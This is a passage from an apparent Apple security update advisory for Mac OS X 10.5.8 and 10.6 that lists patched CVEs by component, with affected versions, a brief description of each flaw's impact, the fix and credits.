handling\n\nof H.263 encoded movie files. Viewing a maliciously crafted movie\n\nfile may lead to an unexpected application termination or arbitrary\n\ncode execution. This issue is addressed by performing additional\n\nvalidation of H.263 encoded movie files. Credit to Damian Put working\n\nwith TippingPoint\u2019s Zero Day Initiative for reporting this issue.\n\nCoreTypes\n\nCVE-ID: CVE-2010-0063\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Users are not warned before opening certain potentially\n\nunsafe content types\n\nDescription: This update adds .ibplugin and .url to the system\u2019s\n\nlist of content types that will be flagged as potentially unsafe\n\nunder certain circumstances, such as when they are downloaded from a\n\nweb page. While these content types are not automatically launched,\n\nif manually opened they could lead to the execution of a malicious\n\nJavaScript payload or arbitrary code execution. This update improves\n\nthe system\u2019s ability to notify users before handling content types\n\nused by Safari. Credit to Clint Ruoho of Laconic Security for\n\nreporting this issue.\n\nCUPS\n\nCVE-ID: CVE-2010-0393\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A local user may be able to obtain system privileges\n\nDescription: A format string issue exists in the lppasswd CUPS\n\nutility. This may allow a local user to obtain system privileges. Mac\n\nOS X v10.6 systems are only affected if the setuid bit has been set\n\non the binary. This issue is addressed by using default directories\n\nwhen running as a setuid process. Credit to Ronald Volgers for\n\nreporting this issue.\n\ncurl\n\nCVE-ID: CVE-2009-2417\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A man-in-the-middle attacker may be able to impersonate a\n\ntrusted server\n\nDescription: A canonicalization issue exists in curl\u2019s handling of\n\nNULL characters in the subject\u2019s Common Name (CN) field of X.509\n\ncertificates. This may lead to man-in-the-middle attacks against\n\nusers of the curl command line tool, or applications using libcurl.\n\nThis issue is addressed through improved handling of NULL characters.\n\ncurl\n\nCVE-ID: CVE-2009-0037\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Using curl with -L may allow a remote attacker to read or\n\nwrite local files\n\nDescription: curl will follow HTTP and HTTPS redirects when used\n\nwith the -L option. When curl follows a redirect, it allows file://\n\nURLs. This may allow a remote attacker to access local files. This\n\nissue is addressed through improved validation of redirects. This\n\nissue does not affect Mac OS X v10.6 systems. Credit to Daniel\n\nStenberg of Haxx AB for reporting this issue.\n\nCyrus IMAP\n\nCVE-ID: CVE-2009-2632\n\nAvailable for: Mac OS X Server v10.5.8\n\nImpact: A local user may be able to obtain the privileges of the\n\nCyrus user\n\nDescription: A buffer overflow exists in the handling of sieve\n\nscripts. By running a maliciously crafted sieve script, a local user\n\nmay be able to obtain the privileges of the Cyrus user. This issue is\n\naddressed through improved bounds checking. This issue does not\n\naffect Mac OS X v10.6 systems.\n\nCyrus SASL\n\nCVE-ID: CVE-2009-0688\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: An unauthenticated remote attacker may cause unexpected\n\napplication termination or arbitrary code execution\n\nDescription: A buffer overflow exists in the Cyrus SASL\n\nauthentication module. Using Cyrus SASL authentication may lead to an\n\nunexpected application termination or arbitrary code execution. This\n\nissue is addressed through improved bounds checking. This issue does\n\nnot affect Mac OS X v10.6 systems.\n\nDesktopServices\n\nCVE-ID: CVE-2010-0064\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Items copied in the Finder may be assigned an unexpected\n\nfile owner\n\nDescription: When performing an authenticated copy in the Finder,\n\noriginal file ownership may be unexpectedly copied. This update\n\naddresses the issue by ensuring that copied files are owned by the\n\nuser performing the copy. This issue does not affect systems prior to\n\nMac OS X v10.6. Credit to Gerrit DeWitt of Auburn University (Auburn,\n\nAL) for reporting this issue.\n\nDesktopServices\n\nCVE-ID: CVE-2010-0537\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may gain access to user data via a multi-\n\nstage attack\n\nDescription: A path resolution issue in DesktopServices is\n\nvulnerable to a multi-stage attack. A remote attacker must first\n\nentice the user to mount an arbitrarily named share, which may be\n\ndone via a URL scheme. When saving a file using the default save\n\npanel in any application, and using \u201cGo to folder\u201d or dragging\n\nfolders to the save panel, the data may be unexpectedly saved to the\n\nmalicious share. This issue is addressed through improved path\n\nresolution. This issue does not affect systems prior to Mac OS X\n\nv10.6. Credit to Sidney San Martin working with DeepTech, Inc. for\n\nreporting this issue.\n\nDisk Images\n\nCVE-ID: CVE-2010-0065\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Mounting a maliciously crafted disk image may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue exists in the handling of\n\nbzip2 compressed disk images. Mounting a maliciously crafted disk\n\nimage may lead to an unexpected application termination or arbitrary\n\ncode execution. This issue is addressed through improved bounds\n\nchecking. Credit: Apple.\n\nDisk Images\n\nCVE-ID: CVE-2010-0497\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Mounting a maliciously crafted disk image may lead to\n\narbitrary code execution\n\nDescription: A design issue exists in the handling of internet\n\nenabled disk images. Mounting an internet enabled disk image\n\ncontaining a package file type will open it rather than revealing it\n\nin the Finder. This file quarantine feature helps to mitigate this\n\nissue by providing a warning dialog for unsafe file types. This issue\n\nis addressed through improved handling of package file types on\n\ninternet enabled disk images. Credit to Brian Mastenbrook working\n\nwith TippingPoint\u2019s Zero Day Initiative for reporting this issue.\n\nDirectory Services\n\nCVE-ID: CVE-2010-0498\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A local user may obtain system privileges\n\nDescription: An authorization issue in Directory Services\u2019 handling\n\nof record names may allow a local user to obtain system privileges.\n\nThis issue is addressed through improved authorization checks.\n\nCredit: Apple.\n\nDovecot\n\nCVE-ID: CVE-2010-0535\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: An authenticated user may be able to send and receive mail\n\neven if the user is not on the SACL of users who are permitted to do\n\nso\n\nDescription: An access control issue exists in Dovecot when Kerberos\n\nauthentication is enabled. This may allow an authenticated user to\n\nsend and receive mail even if the user is not on the service access\n\ncontrol list (SACL) of users who are permitted to do so. This issue\n\nis addressed through improved access control checks. This issue does\n\nnot affect systems prior to Mac OS X v10.6.\n\nEvent Monitor\n\nCVE-ID: CVE-2010-0500\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may cause arbitrary systems to be added to\n\nthe firewall blacklist\n\nDescription: A reverse DNS lookup is performed on remote ssh clients\n\nthat fail to authenticate. A plist injection issue exists in the\n\nhandling of resolved DNS names. This may allow a remote attacker to\n\ncause arbitrary systems to be added to the firewall blacklist. This\n\nissue is addressed by properly escaping resolved DNS names. Credit:\n\nApple.\n\nFreeRADIUS\n\nCVE-ID: CVE-2010-0524\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may obtain access to a network via RADIUS\n\nauthentication\n\nDescription: A certificate authentication issue exists in the\n\ndefault Mac OS X configuration of the FreeRADIUS server. A remote\n\nattacker may use EAP-TLS with an arbitrary valid certificate to\n\nauthenticate and connect to a network configured to use FreeRADIUS\n\nfor authentication. This issue is addressed by disabling support for\n\nEAP-TLS in the configuration. RADIUS clients should use EAP-TTLS\n\ninstead. This issue only affects Mac OS X Server systems. Credit to\n\nChris Linstruth of Qnet for reporting this issue.\n\nFTP Server\n\nCVE-ID: CVE-2010-0501\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Users may be able to retrieve files outside the FTP root\n\ndirectory\n\nDescription: A directory traversal issue exists in FTP Server. This\n\nmay allow a user to retrieve files outside the FTP root directory.\n\nThis issue is addressed through improved handling of file names. This\n\nissue only affects Mac OS X Server systems. Credit: Apple.\n\niChat Server\n\nCVE-ID: CVE-2006-1329\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: An implementation issue exists in jabberd\u2019s handling of\n\nSASL negotiation. A remote attacker may be able to terminate the\n\noperation of jabberd. This issue is addressed through improved\n\nhandling of SASL negotiation. This issue only affects Mac OS X Server\n\nsystems.\n\niChat Server\n\nCVE-ID: CVE-2010-0502\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Chat messages may not be logged\n\nDescription: A design issue exists in iChat Server\u2019s support for\n\nconfigurable group chat logging. iChat Server only logs messages with\n\ncertain message types. This may allow a remote user to send a message\n\nthrough the server without it being logged. The issue is addressed by\n\nremoving the capability to disable group chat logs, and logging all\n\nmessages that are sent through the server. This issue only affects\n\nMac OS X Server systems. Credit: Apple.\n\niChat Server\n\nCVE-ID: CVE-2010-0503\n\nAvailable for: Mac OS X Server v10.5.8\n\nImpact: An authenticated user may be able to cause an unexpected\n\napplication termination or arbitrary code execution\n\nDescription: A use-after-free issue exists in iChat Server. An\n\nauthenticated user may be able to cause an unexpected application\n\ntermination or arbitrary code execution. This issue is addressed\n\nthrough improved memory reference tracking. This issue only affects\n\nMac OS X Server systems, and does not affect versions 10.6 or later.\n\niChat Server\n\nCVE-ID: CVE-2010-0504\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: An authenticated user may be able to cause an unexpected\n\napplication termination or arbitrary code execution\n\nDescription: Multiple stack buffer overflow issues exist in iChat\n\nServer. An authenticated user may be able to cause an unexpected\n\napplication termination or arbitrary code execution. These issues are\n\naddressed through improved memory management. These issues only\n\naffect Mac OS X Server systems. Credit: Apple.\n\nImageIO\n\nCVE-ID: CVE-2010-0505\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted JP2 image may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow exists in the handling of JP2\n\nimages. Viewing a maliciously crafted JP2 image may lead to an\n\nunexpected application termination or arbitrary code execution. This\n\nissue is addressed through improved bounds checking. Credit to Chris\n\nRies of Carnegie Mellon University Computing Service, and researcher\n\n\u201c85319bb6e6ab398b334509c50afce5259d42756e\u201d working with\n\nTippingPoint\u2019s Zero Day Initiative for reporting this issue.\n\nImageIO\n\nCVE-ID: CVE-2010-0041\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Visiting a maliciously crafted website may result in sending\n\ndata from Safari\u2019s memory to the website\n\nDescription: An uninitialized memory access issue exists in\n\nImageIO\u2019s handling of BMP images. Visiting a maliciously crafted\n\nwebsite may result in sending data from Safari\u2019s memory to the\n\nwebsite. This issue is addressed through improved memory\n\ninitialization and additional validation of BMP images. Credit to\n\nMatthew \u2018j00ru\u2019 Jurczyk of Hispasec for reporting this issue.\n\nImageIO\n\nCVE-ID: CVE-2010-0042\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Visiting a maliciously crafted website may result in sending\n\ndata from Safari\u2019s memory to the website\n\nDescription: An uninitialized memory access issue exists in\n\nImageIO\u2019s handling of TIFF images. Visiting a maliciously crafted\n\nwebsite may result in sending data from Safari\u2019s memory to the\n\nwebsite. This issue is addressed through improved memory\n\ninitialization and additional validation of TIFF images. Credit to\n\nMatthew \u2018j00ru\u2019 Jurczyk of Hispasec for reporting this issue.\n\nImageIO\n\nCVE-ID: CVE-2010-0043\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Processing a maliciously crafted TIFF image may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue exists in the handling of\n\nTIFF images. Processing a maliciously crafted TIFF image may lead to\n\nan unexpected application termination or arbitrary code execution.\n\nThis issue is addressed through improved memory handling. This issue\n\ndoes not affect systems prior to Mac OS X v10.6. Credit to Gus\n\nMueller of Flying Meat for reporting this issue.\n\nImage RAW\n\nCVE-ID: CVE-2010-0506\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Viewing a maliciously crafted NEF image may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow exists in Image RAW\u2019s handling of NEF\n\nimages. Viewing a maliciously crafted NEF image may lead to an\n\nunexpected application termination or arbitrary code execution. This\n\nissue is addressed through improved bounds checking. This issue does\n\nnot affect Mac OS X v10.6 systems. Credit: Apple.\n\nImage RAW\n\nCVE-ID: CVE-2010-0507\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted PEF image may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow exists in Image RAW\u2019s handling of PEF\n\nimages. Viewing a maliciously crafted PEF image may lead to an\n\nunexpected application termination or arbitrary code execution. This\n\nissue is addressed through improved bounds checking. Credit to Chris\n\nRies of Carnegie Mellon University Computing Services for reporting\n\nthis issue.\n\nLibsystem\n\nCVE-ID: CVE-2009-0689\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Applications that convert untrusted data between binary\n\nfloating point and text may be vulnerable to an unexpected\n\napplication termination or arbitrary code execution\n\nDescription: A buffer overflow exists in the floating point binary\n\nto text conversion code within Libsystem. An attacker who can cause\n\nan application to convert a floating point value into a long string,\n\nor to parse a maliciously crafted string as a floating point value,\n\nmay be able to cause an unexpected application termination or\n\narbitrary code execution. This issue is addressed through improved\n\nbounds checking. Credit to Maksymilian Arciemowicz of\n\nSecurityReason.com for reporting this issue.\n\nMail\n\nCVE-ID: CVE-2010-0508\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Rules associated with a deleted mail account remain in\n\neffect\n\nDescription: When a mail account is deleted, user-defined filter\n\nrules associated with that account remain active. This may result in\n\nunexpected actions. This issue is addressed by disabling associated\n\nrules when a mail account is deleted.\n\nMail\n\nCVE-ID: CVE-2010-0525\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Mail may use a weaker encryption key for outgoing email\n\nDescription: A logic issue exists in Mail\u2019s handling of encryption\n\ncertificates. When multiple certificates for the recipient exist in\n\nthe keychain, Mail may select an encryption key that is not intended\n\nfor encipherment. This may lead to a security issue if the chosen key\n\nis weaker than expected. This issue is addressed by ensuring that the\n\nkey usage extension within certificates is evaluated when selecting a\n\nmail encryption key. Credit to Paul Suh of ps Enable, Inc. for\n\nreporting this issue.\n\nMailman\n\nCVE-ID: CVE-2008-0564\n\nAvailable for: Mac OS X Server v10.5.8\n\nImpact: Multiple vulnerabilities in Mailman 2.1.9\n\nDescription: Multiple cross-site scripting issues exist in Mailman\n\n2.1.9. These issues are addressed by updating Mailman to version\n\n2.1.13. Further information is available via the Mailman site at\n\nhttp://mail.python.org/pipermail/mailman-\n\nannounce/2009-January/000128.html These issues only affect Mac OS X\n\nServer systems, and do not affect versions 10.6 or later.\n\nMySQL\n\nCVE-ID: CVE-2008-4456, CVE-2008-7247, CVE-2009-2446, CVE-2009-4019,\n\nCVE-2009-4030\n\nAvailable for: Mac OS X Server v10.6 through v10.6.2\n\nImpact: Multiple vulnerabilities in MySQL 5.0.82\n\nDescription: MySQL is updated to version 5.0.88 to address multiple\n\nvulnerabilities, the most serious of which may lead to arbitrary code\n\nexecution. These issues only affect Mac OS X Server systems. Further\n\ninformation is available via the MySQL web site at\n\nhttp://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.html\n\nOS Services\n\nCVE-ID: CVE-2010-0509\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A local user may be able to obtain elevated privileges\n\nDescription: A privilege escalation issue exists in SFLServer, as it\n\nruns as group \u2018wheel\u2019 and accesses files in users\u2019 home directories.\n\nThis issue is addressed through improved privilege management. Credit\n\nto Kevin Finisterre of DigitalMunition for reporting this issue.\n\nPassword Server\n\nCVE-ID: CVE-2010-0510\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may be able to log in with an outdated\n\npassword\n\nDescription: An implementation issue in Password Server\u2019s handling\n\nof replication may cause passwords to not be replicated. A remote\n\nattacker may be able to log in to a system using an outdated\n\npassword. This issue is addressed through improved handling of\n\npassword replication. This issue only affects Mac OS X Server\n\nsystems. Credit to Jack Johnson of Anchorage School District for\n\nreporting this issue.\n\nperl\n\nCVE-ID: CVE-2008-5302, CVE-2008-5303\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: A local user may cause arbitrary files to be deleted\n\nDescription: Multiple race condition issues exist in the rmtree\n\nfunction of the perl module File::Path. A local user with write\n\naccess to a directory that is being deleted may cause arbitrary files\n\nto be removed with the privileges of the perl process. This issue is\n\naddressed through improved handling of symbolic links. This issue\n\ndoes not affect Mac OS X v10.6 systems.\n\nPHP\n\nCVE-ID: CVE-2009-3557, CVE-2009-3558, CVE-2009-3559, CVE-2009-4017\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Multiple vulnerabilities in PHP 5.3.0\n\nDescription: PHP is updated to version 5.3.1 to address multiple\n\nvulnerabilities, the most serious of which may lead to arbitary code\n\nexecution. Further information is available via the PHP website at\n\nhttp://www.php.net/\n\nPHP\n\nCVE-ID: CVE-2009-3557, CVE-2009-3558, CVE-2009-3559, CVE-2009-4142,\n\nCVE-2009-4143\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Multiple vulnerabilities in PHP 5.2.11\n\nDescription: PHP is updated to version 5.2.12 to address multiple\n\nvulnerabilities, the most serious of which may lead to cross-site\n\nscripting. Further information is available via the PHP website at\n\nhttp://www.php.net/\n\nPodcast Producer\n\nCVE-ID: CVE-2010-0511\n\nAvailable for: Mac OS X Server v10.6 through v10.6.2\n\nImpact: An unauthorized user may be able to access a Podcast\n\nComposer workflow\n\nDescription: When a Podcast Composer workflow is overwritten, the\n\naccess restrictions are removed. This may allow an unauthorized user\n\nto access a Podcast Composer workflow. This issue is addressed\n\nthrough improved handling of workflow access restrictions. Podcast\n\nComposer was introduced in Mac OS X Server v10.6.\n\nPreferences\n\nCVE-ID: CVE-2010-0512\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: A network user may be able to bypass system login\n\nrestrictions\n\nDescription: An implementation issue exists in the handling of\n\nsystem login restrictions for network accounts. If the network\n\naccounts allowed to log in to the system at the Login Window are\n\nidentified by group membership only, the restriction will not be\n\nenforced, and all network users will be allowed to log in to the\n\nsystem. The issue is addressed through improved group restriction\n\nmanagement in the Accounts preference pane. This issue only affects\n\nsystems configured to use a network account server, and does not\n\naffect systems prior to Mac OS X v10.6. Credit to Christopher D.\n\nGrieb of University of Michigan MSIS for reporting this issue.\n\nPS Normalizer\n\nCVE-ID: CVE-2010-0513\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted PostScript file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A stack buffer overflow exists in the handling of\n\nPostScript files. Viewing a maliciously crafted PostScript file may\n\nlead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed by performing additional\n\nvalidation of PostScript files. On Mac OS X v10.6 systems this issue\n\nis mitigated by the -fstack-protector compiler flag. Credit: Apple.\n\nQuickTime\n\nCVE-ID: CVE-2010-0062\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow exists in QuickTime\u2019s handling\n\nof H.263 encoded movie files. Viewing a maliciously crafted movie\n\nfile may lead to an unexpected application termination or arbitrary\n\ncode execution. This issue is addressed by performing additional\n\nvalidation of H.263 encoded movie files. Credit to Damian Put working\n\nwith TippingPoint\u2019s Zero Day Initiative for reporting this issue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0514\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow exists in the handling of H.261\n\nencoded movie files. Viewing a maliciously crafted movie file may\n\nlead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed by performing additional\n\nvalidation of H.261 encoded movie files. Credit to Will Dormann of\n\nthe CERT/CC for reporting this issue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0515\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A memory corruption in the handling of H.264 encoded\n\nmovie files. Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution. This\n\nissue is addressed by performing additional validation of H.264\n\nencoded movie files.\n\nQuickTime\n\nCVE-ID: CVE-2010-0516\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow in the handling of RLE encoded\n\nmovie files. Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution. This\n\nissue is addressed by performing additional validation of RLE encoded\n\nmovie files. Credit to an anonymous researcher working with\n\nTippingPoint\u2019s Zero Day Initiative for reporting this issue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0517\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow in the handling of M-JPEG\n\nencoded movie files. Viewing a maliciously crafted movie file may\n\nlead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed by performing additional\n\nvalidation of M-JPEG encoded movie files. Credit to Damian Put\n\nworking with TippingPoint\u2019s Zero Day Initiative for reporting this\n\nissue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0518\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue exists in the handling of\n\nSorenson encoded movie files. Viewing a maliciously crafted movie\n\nfile may lead to an unexpected application termination or arbitrary\n\ncode execution. This issue is addressed by performing additional\n\nvalidation of Sorenson encoded movie files. Credit to Will Dormann of\n\nthe CERT/CC for reporting this issue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0519\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: An integer overflow exists in the handling of FlashPix\n\nencoded movie files. Viewing a maliciously crafted movie file may\n\nlead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed through improved bounds checking.\n\nCredit to an anonymous researcher working with TippingPoint\u2019s Zero\n\nDay Initiative for reporting this issue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0520\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted movie file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow exists in the handling of FLC\n\nencoded movie files. Viewing a maliciously crafted movie file may\n\nlead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed by performing additional\n\nvalidation of FLC encoded movie files. Credit to Moritz Jodeit of\n\nn.runs AG, working with TippingPoint\u2019s Zero Day Initiative, and\n\nNicols Joly of VUPEN Security for reporting this issue.\n\nQuickTime\n\nCVE-ID: CVE-2010-0526\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted MPEG file may lead to an\n\nunexpected application termination or arbitrary code execution\n\nDescription: A heap buffer overflow exists in the handling of MPEG\n\nencoded movie files. Viewing a maliciously crafted movie file may\n\nlead to an unexpected application termination or arbitrary code\n\nexecution. This issue is addressed by performing additional\n\nvalidation of MPEG encoded movie files. Credit to an anonymous\n\nresearcher working with TippingPoint\u2019s Zero Day Initiative for\n\nreporting this issue.\n\nRuby\n\nCVE-ID: CVE-2009-2422, CVE-2009-3009, CVE-2009-4214\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Multiple issues in Ruby on Rails\n\nDescription: Multiple vulnerabilities exist in Ruby on Rails, the\n\nmost serious of which may lead to cross-site scripting. On Mac OS X\n\nv10.6 systems, these issues are addressed by updating Ruby on Rails\n\nto version 2.3.5. Mac OS X v10.5 systems are affected only by\n\nCVE-2009-4214, and this issue is addressed through improved\n\nvalidation of arguments to strip_tags.\n\nRuby\n\nCVE-ID: CVE-2009-1904\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Running a Ruby script that uses untrusted input to\n\ninitialize a BigDecimal object may lead to an unexpected application\n\ntermination\n\nDescription: A stack exhaustion issue exists in Ruby\u2019s handling of\n\nBigDecimal objects with very large values. Running a Ruby script that\n\nuses untrusted input to initialize a BigDecimal object may lead to an\n\nunexpected application termination. For Mac OS X v10.6 systems, this\n\nissue is addressed by updating Ruby to version 1.8.7-p173. For Mac OS\n\nv10.5 systems, this issue is addressed by updating Ruby to version\n\n1.8.6-p369.\n\nServer Admin\n\nCVE-ID: CVE-2010-0521\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may extract information from Open\n\nDirectory\n\nDescription: A design issue exists in the handling of authenticated\n\ndirectory binding. A remote attacker may be able to anonymously\n\nextract information from Open Directory, even if the \u201cRequire\n\nauthenticated binding between directory and clients\u201d option is\n\nenabled. The issue is addressed by removing this configuration\n\noption. This issue only affects Mac OS X Server systems. Credit to\n\nScott Gruby of Gruby Solutions, and Mathias Haack of GRAVIS\n\nComputervertriebsgesellschaft mbH for reporting this issue.\n\nServer Admin\n\nCVE-ID: CVE-2010-0522\n\nAvailable for: Mac OS X Server v10.5.8\n\nImpact: A former administrator may have unauthorized access to\n\nscreen sharing\n\nDescription: A user who is removed from the \u2018admin\u2019 group may still\n\nconnect to the server using screen sharing. This issue is addressed\n\nthrough improved handling of administrator privileges. This issue\n\nonly affects Mac OS X Server systems, and does not affect version\n\n10.6 or later. Credit: Apple.\n\nSMB\n\nCVE-ID: CVE-2009-2906\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: An infinite loop issue exists in Samba\u2019s handling of\n\nSMB \u2018oplock\u2019 break notifications. A remote attacker may be able to\n\ntrigger an infinite loop in smbd, causing it to consume excessive CPU\n\nresources. The issue is addressed through improved handling of\n\n\u2018oplock\u2019 break notifications.\n\nTomcat\n\nCVE-ID: CVE-2009-0580, CVE-2009-0033, CVE-2009-0783, CVE-2008-5515,\n\nCVE-2009-0781, CVE-2009-2901, CVE-2009-2902, CVE-2009-2693\n\nAvailable for: Mac OS X Server v10.5.8,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: Multiple vulnerabilities in Tomcat 6.0.18\n\nDescription: Tomcat is updated to version 6.0.24 to address multiple\n\nvulnerabilities, the most serious of which may lead to a cross site\n\nscripting attack. Tomcat is only provided on Mac OS X Server systems.\n\nFurther information is available via the Tomcat site at\n\nhttp://tomcat.apache.org/\n\nunzip\n\nCVE-ID: CVE-2008-0888\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Extracting maliciously crafted zip files using the 